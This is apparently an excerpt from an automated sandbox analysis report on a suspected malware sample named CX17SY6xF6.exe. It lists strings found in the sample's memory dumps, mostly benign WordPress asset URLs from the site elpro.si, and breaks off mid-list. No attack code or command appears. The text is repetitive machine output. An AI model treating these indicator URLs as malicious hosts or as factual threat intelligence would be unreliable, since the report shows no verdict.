                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.23.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.min.js?v
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.min.js?v
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/css/style.css?ver=6.2.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/favicon.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Kosarica.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Search-Grey.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Search-White.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/uploads/2020/02/LOG
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header_new.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/classic-themes.min.css?ver=6.2.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 